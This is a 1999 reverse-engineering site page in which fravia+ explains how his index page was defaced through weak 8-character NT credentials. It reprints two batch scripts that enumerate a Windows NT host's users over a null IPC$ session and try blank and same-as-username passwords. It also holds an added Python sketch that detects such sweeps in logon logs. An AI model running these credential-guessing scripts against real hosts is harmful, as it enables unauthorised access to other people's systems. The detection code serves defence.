fravia's index page hacked on 1 October 1999
by fravia+
courtesy of fravia's pages of reverse engineering
(published at fravia's in October 1999)

Well, on 01 October 1999 sort of succeeded in hacking my front page and substituted my index.htm with this page.
The hack was possible because my username/password combination (against better wisdom... "he doesn't practice what he's teaching" :-( ) were both 8 characters long (an old tradition I am now completely rid of :-)
In these cases you can successfully attack an NT box using the following scripts (courtesy of our NT-expert .sozni):

The hack wasn't as elegant as it may seem. The attacker took a simple batch file .sozni wrote that tries to connect to an NT box using username/username then username/"".

The attacker just ran the following batch file on my host and it gave him a login. Then he just did this at a command prompt:

net use \\<your ip>\IPC$ /user:<username> <password>

In case you are interested, here is the text of sozni's 2 batch files (which require another file, lsuser.exe, to work properly):

====TEST.BAT====

@echo Connecting to \\%1...
@net use \\%1\IPC$ "" /user:""
@nbtstat -A %1
@echo Retrieving list of users...
@lsuser -h\\%1 -n > %1.users
@echo Checking passwords...
@net use \\%1\IPC$ /delete
@FOR /F "skip=2" %%a IN (%1.users) DO @For %%b IN (%%a "") DO @(test2.bat %1 %%a %%b)
@del /f %1.users

=====TEST2.BAT=======

@echo Trying to login using %2/%3
@echo *****%2/%3
@net use \\%1\IPC$ /user:%2 %3 && Net use \\%1\IPC$ /delete

=====================

You just run Test <ip> and it gets usernames and tries two passwords then moves on. Very simple but you wouldn't believe how many thousands of times this works (even on some very big companies).
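Seen from the defended host, the sequence above is a null session on IPC$ followed within seconds by logon attempts against many different accounts from the same address. The following detection sketch is an added example, not part of the original page or of sozni's scripts. It assumes logon records already reduced to (time, event id, source, account) tuples using the Windows Security log IDs 4624/4625; the sample records, addresses, account names and thresholds are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

NULL_ACCT = "ANONYMOUS LOGON"      # account name recorded for a null session
LOGON_OK, LOGON_FAIL = 4624, 4625  # Windows Security log: logon success / failure

# Constructed sample records (time, event id, source address, account); not real logs.
SAMPLE_EVENTS = [
    ("2024-01-01 03:10:00", LOGON_OK,   "203.0.113.7",   NULL_ACCT),
    ("2024-01-01 03:10:04", LOGON_FAIL, "203.0.113.7",   "Administrator"),
    ("2024-01-01 03:10:05", LOGON_FAIL, "203.0.113.7",   "Administrator"),
    ("2024-01-01 03:10:06", LOGON_FAIL, "203.0.113.7",   "Guest"),
    ("2024-01-01 03:10:07", LOGON_FAIL, "203.0.113.7",   "Guest"),
    ("2024-01-01 03:10:08", LOGON_OK,   "203.0.113.7",   "webadmin"),
    ("2024-01-01 09:00:00", LOGON_FAIL, "198.51.100.20", "alice"),    # typo, then success
    ("2024-01-01 09:00:09", LOGON_OK,   "198.51.100.20", "alice"),
    ("2024-01-01 09:30:00", LOGON_OK,   "198.51.100.30", NULL_ACCT),  # lone null session
    ("2024-01-01 09:30:02", LOGON_OK,   "198.51.100.30", "bob"),
]

def find_sweeps(events, window=timedelta(minutes=5), min_accounts=3):
    """Flag sources that open a null session and then try many accounts.

    Returns one finding per source: how many distinct accounts were tried
    inside the window and which of them ended in a successful logon.
    """
    by_src = defaultdict(list)
    for ts, eid, src, acct in events:
        by_src[src].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), eid, acct))
    findings = []
    for src, evs in by_src.items():
        evs.sort()
        for start, eid, acct in evs:
            if eid != LOGON_OK or acct != NULL_ACCT:
                continue  # only a null session opens a candidate window
            burst = [e for e in evs
                     if start < e[0] <= start + window and e[2] != NULL_ACCT]
            tried = {a for _, _, a in burst}
            if len(tried) >= min_accounts:
                guessed = sorted({a for _, i, a in burst if i == LOGON_OK})
                findings.append({"source": src, "accounts_tried": len(tried),
                                 "succeeded": guessed})
                break  # one finding per source is enough
    return findings

if __name__ == "__main__":
    for finding in find_sweeps(SAMPLE_EVENTS):
        print(finding)
```

Accounts listed under "succeeded" are the ones to lock and reset first.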

.sozni usually combines this with a little util +greythorne wrote for him in order to scan a whole class C network.

Some better and more complete material can be found on some of the documents by Rhino9.

If you want to visit activeX wizard sozni's page, go ahead.

